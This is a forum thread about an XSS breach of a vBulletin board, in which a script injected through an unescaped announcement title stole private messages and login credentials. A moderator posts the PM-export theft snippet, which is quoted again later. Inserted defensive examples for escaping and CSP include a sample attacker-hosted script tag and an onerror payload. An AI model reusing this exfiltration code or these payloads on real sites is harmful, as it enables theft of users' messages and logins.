question about the "Breach"


ViRGE

Elite Member, Moderator Emeritus
Oct 9, 1999
31,516
167
106
We're looking into the logs to double-check.
The logs have been double checked. The compromised mod account has no activity for global announcements predating yesterday. And as far as we're aware no other mod accounts were compromised.
 

MWink

Diamond Member
Oct 9, 1999
3,642
1
76
I had to reset my password. So, was my account one of the ones compromised? Also, might I suggest putting a link to the password reset page in the announcement post.
 

VirtualLarry

No Lifer
Aug 25, 2001
56,570
10,205
126
A better question might be, how does a Mod account have enough privileges to create a script that runs for everyone logged in, without even having to view the announcement to run the script, not to mention how do Mod accounts (and not Admin accounts) have privs to read our PMs anyway?

I thought when Mosh was banned, they claimed that Mods hacked their account to read their PMs. So this breach announcement is telling us that any Mod account can simply read our PMs, that they are in fact, not "private"?

And that some remote hacker did just that, and sucked up all of our PMs to some remote server?

How long until Mod accounts (and higher) require two-factor authentication? (RSA key fobs, cell-phone callbacks, or fingerprint or other biometric authentication devices?)
 

ViRGE

Elite Member, Moderator Emeritus
Oct 9, 1999
31,516
167
106
A better question might be, how does a Mod account have enough privileges to create a script that runs for everyone logged in, without even having to view the announcement to run the script
The script was hosted on a 3rd party server. There was a JavaScript <script> tag in the title of the announcement, and as HTML was turned on for that announcement, the tag was not escaped and dutifully executed by clients. This is a stock feature of vB.

not to mention, how do Mod accounts (and not Admin) accounts, have privs to read our PMs anyways?

I thought when Mosh was banned, they claimed that Mods hacked their account to read their PMs. So this breach announcement is telling us that any Mod account can simply read our PMs, that they are in fact, not "private"?

And that some remote hacker did just that, and sucked up all of our PMs to some remote server?
The PMs weren't stolen by going through mod accounts. They were stolen by the script executing on client computers, which in turn triggered the PM export option for the user's account and then piped the output of that to the remote server.*

Mods and Admins cannot directly access user PMs. The only way around that is for the Admins to set your password to something they know so that they can log into your account. This is a very overt action that cannot be hidden, and is by design.

How long until Mod accounts (and higher) require two-factor authentication? (RSA key fobs, cell-phone callbacks, or fingerprint or other biometric authentication devices?)
We'll have to see what vB 5 brings us.

*The PM theft code in question
Code:
// Fetches the logged-in user's own PM export (vB's private.php?do=downloadpm)
// with the victim's session cookie, serialises the returned XML document and
// hands it to request(), which posts it to the attacker's server.
// PATH_FORUM, TYPE_USER and request() are defined elsewhere in the script.
function getMessages() {
	$.get(PATH_FORUM + '../private.php?do=downloadpm&dowhat=xml', function(data) {
		request({ type: TYPE_USER, messages: escape((new XMLSerializer()).serializeToString(data)) });
	});
}
 
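The mechanism ViRGE describes above (an announcement title dropped into the page as raw HTML, so a <script> tag inside it runs for every viewer) as an added example. This is not vBulletin code and not code from the thread; it shows the unsafe rendering next to the escaped rendering that neutralises it, plus a sweep an admin could run over stored announcement titles to find ones carrying markup. The titles, hostnames and row ids are constructed for the example.

```javascript
// Added example (not vBulletin code): stored XSS via an unescaped title,
// the escaped rendering that fixes it, and a triage sweep over stored titles.
// Runs under Node.js with no DOM; everything below is constructed sample data.

// Constructed: what a poisoned announcement title might look like.
const POISONED_TITLE =
  'Forum maintenance tonight<script src="https://evil.example.net/pm.js"></script>';

// The behaviour the thread describes: with HTML enabled, the title goes into
// the page verbatim, so a <script> tag inside it runs in every viewer's browser.
function renderTitleUnsafe(title) {
  return `<h2 class="announcement">${title}</h2>`;
}

// Escape the five characters that can change HTML text or attribute context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Same template, but the title is treated as data, never as markup.
function renderTitleSafe(title) {
  return `<h2 class="announcement">${escapeHtml(title)}</h2>`;
}

// True if the markup carries a live <script> element (crude, but enough to
// tell an escaped title from an unescaped one).
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Triage helper: given stored announcement rows, return the ids whose title
// contains any tag at all. Legitimate titles have no reason to carry markup,
// so every hit deserves a look.
function findTaintedTitles(rows) {
  return rows.filter(r => /<\s*\/?\s*[a-z][^>]*>/i.test(r.title)).map(r => r.id);
}

// Constructed sample rows standing in for an announcement table.
const SAMPLE_ROWS = [
  { id: 101, title: 'Welcome to the forums' },
  { id: 102, title: POISONED_TITLE },
  { id: 103, title: 'Rules update: please read' },
  { id: 104, title: 'Mod note<img src=x onerror="alert(1)">' },
];

console.log('unsafe :', renderTitleUnsafe(POISONED_TITLE));
console.log('safe   :', renderTitleSafe(POISONED_TITLE));
console.log('tainted:', findTaintedTitles(SAMPLE_ROWS));
```

The escaping is the fix the thread implies: the title is never meant to be markup, so the "HTML on" switch should not apply to it at all. The sweep is the first thing to run after an incident like this, since a single compromised mod account may have edited more than one announcement.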

sao123

Lifer
May 27, 2002
12,653
205
106
The PMs weren't stolen by going through mod accounts. They were stolen by the script executing on client computers, which in turn triggered the PM export option for the user's account and then piped the output of that to the remote server.*


*The PM theft code in question
Code:
function getMessages() {
    $.get(PATH_FORUM + '../private.php?do=downloadpm&dowhat=xml', function(data) {
        request({ type: TYPE_USER, messages: escape((new XMLSerializer()).serializeToString(data)) });
    });
}

Do we know the extent of what this particular script is capable of?
Could it steal passwords or from other sites which might have been accessed while it was running on the host PC?

this sounds worse than I thought...
 

ViRGE

Elite Member, Moderator Emeritus
Oct 9, 1999
31,516
167
106
No. That would require a Cross Site Scripting (XSS) vulnerability in the browser. Furthermore that is only part of the script; the script is hard-coded to our forums. The PATH_FORUM variable for example is our forum URL.
 

sao123

Lifer
May 27, 2002
12,653
205
106
Although you have examined the logs, I will provide this, just in case it could possibly give any benefit.

I went back and looked at my calendar, and I can say with a high confidence level that one of the possible breaches I noticed occurred in the period 7/7-7/9.
I was on a business trip and stuck in a hotel with my work laptop. I read lots, and only made a few posts. This is one of the instances I'm 90% sure I saw an odd global announcement.
 

ViRGE

Elite Member, Moderator Emeritus
Oct 9, 1999
31,516
167
106
We appreciate the input, sao. Not that we want to doubt you guys, there just isn't anything to back up that claim. Mods don't have the ability to delete logs, and the compromised account is clean prior to the 14th.

Either way, hopefully we have this fully nipped in the bud.
 

Idontcare

Elite Member
Oct 10, 1999
21,110
59
91
I thought when Mosh was banned, they claimed that Mods hacked their account to read their PMs. So this breach announcement is telling us that any Mod account can simply read our PMs, that they are in fact, not "private"?

And that some remote hacker did just that, and sucked up all of our PMs to some remote server?

The "private" aspect of your private messages is that they are not public...i.e. they are not freely available for every other member of the forums to read.

Yes the moderators do everything reasonable and prudent to not see your private messages but the simple fact of the matter is that there are times when we need to read them for the sake of facilitating criminal investigations and so on.

So we cannot assure you your private messages are any more private than the FCC can assure you that your telephone line is not tapped, or that your car is not currently carrying a GPS tracking device feeding information back to the FBI or CIA.

These are private messages, not ultra-super-duper top-secret "even the NSA can't see them" type private.

The private nature of a pm is merely casual, a privilege that can dissipate at any time as this particular breach has shown.

No mod wants to read your pm's, and if they did then you'd know they did because your password would be reset and you'd have an email telling you it was.

But there are plenty of hackers out there who do want to read your pm's, and those are the real boogeymen you should be worried about.

If you don't want the contents of your pm's to become public domain information then the only way to ensure that is to not use pm's. It isn't a secure system, it wasn't meant to be used as if it were.

It is a freely provided feature of these freely provided forums, maintained by a volunteer crew of moderators who freely give of their personal time to keep the forums somewhat cohesive and functional.

That alone should give you pause for consideration as to what you store, and how you view, the "private" aspects of the evidently hackable private messaging system.
 

snor

Senior member
Feb 3, 2006
889
0
76
Were the passwords hashed or anything when taken? Or should we assume it was unencrypted when it was compromised? I changed my password anyway, but just curious regarding future security precautions...
 

ViRGE

Elite Member, Moderator Emeritus
Oct 9, 1999
31,516
167
106
Were the passwords hashed or anything when taken? Or should we assume it was unencrypted when it was compromised? I changed my password anyway, but just curious regarding future security precautions...
It wasn't a DB hack, it was an XSS hack. They didn't touch our DB; passwords were exposed by embedding an XSS that copied down users' credentials as they entered them to log in. Which is why only 141 accounts were compromised.
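The injected script was, per the thread, hosted on a third-party server and loaded from the forum's own pages, where it could export PMs and capture login credentials. A Content-Security-Policy restricting script-src to the forum's own origin would have refused such a script before it ran. This is an added example, not part of the thread and not vBulletin code: a small evaluator for the CSP script-src directive that shows which policies would and would not have allowed the externally hosted script. The origin and hostnames are constructed placeholders, and the evaluator covers only the source forms used here ('none', 'self', '*', scheme and host sources), not nonces or hashes.

```javascript
// Added example (not code from the thread or from vBulletin): a minimal
// evaluator for the CSP script-src directive, used to show that a policy of
// script-src 'self' refuses a third-party hosted script injected into a page.
// Node.js; the origin and hostnames below are constructed placeholders.

const FORUM_ORIGIN = 'https://forums.example.com';
const INJECTED_SCRIPT = 'https://evil.example.net/pm.js';

// Parse a Content-Security-Policy header into { directive: [sources] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Does one source expression permit loading `url` from a page at `pageOrigin`?
// Handles 'none', 'self', '*', scheme sources (https:) and host sources
// ([scheme://]host[:port][/path], with a leading *. wildcard). Nonce and hash
// sources are not modelled and simply never match an external URL.
function sourceMatches(expr, url, pageOrigin) {
  const u = new URL(url);
  const page = new URL(pageOrigin);
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === "'self'") return u.origin === page.origin;
  if (e === '*') return u.protocol === 'http:' || u.protocol === 'https:';
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return u.protocol === e;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:]+)(?::(\d+|\*))?(\/.*)?$/.exec(e);
  if (!m) return false;
  const [, scheme, wildcard, host, port, path] = m;
  if (scheme && u.protocol !== scheme + ':') return false;
  if (!scheme && !(u.protocol === 'http:' || u.protocol === 'https:')) return false;
  const uh = u.hostname.toLowerCase();
  if (wildcard ? !uh.endsWith('.' + host) : uh !== host) return false;
  if (port && port !== '*') {
    const effective = u.port || (u.protocol === 'https:' ? '443' : '80');
    if (effective !== port) return false;
  }
  if (path && !u.pathname.startsWith(path)) return false;
  return true;
}

// Would a browser enforcing `header` load `url` as a script on the forum?
// script-src falls back to default-src; with neither, nothing is restricted.
function scriptAllowed(header, url, pageOrigin = FORUM_ORIGIN) {
  const policy = parseCsp(header);
  const sources = policy['script-src'] || policy['default-src'];
  if (!sources) return true;
  return sources.some(src => sourceMatches(src, url, pageOrigin));
}

for (const header of ["script-src 'self'", "script-src 'self' https://cdn.example.com", "img-src 'self'"]) {
  console.log(JSON.stringify(header), '->', scriptAllowed(header, INJECTED_SCRIPT) ? 'allowed' : 'blocked');
}
```

The point the example makes is narrow: CSP does not fix the escaping bug, and an attacker who can inject markup can still do damage with inline handlers unless those are restricted too, but it would have stopped the specific "script tag pointing at a third-party host" technique described here, and it is a header an admin can deploy without waiting for a new forum release.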
 

ViRGE

Elite Member, Moderator Emeritus
Oct 9, 1999
31,516
167
106
Why would they take PMs if the only people who can read them are the owners?
They're exported as XML files and downloaded to the remote server. At which point the attacker can read them.
 

pcslookout

Lifer
Mar 18, 2007
11,959
157
106
It wasn't a DB hack, it was an XSS hack. They didn't touch our DB; passwords were exposed by embedding a XSS that copied down users credentials as they entered them to log in. Which is why only 141 accounts were compromised.

Did they get Soundmanred?
 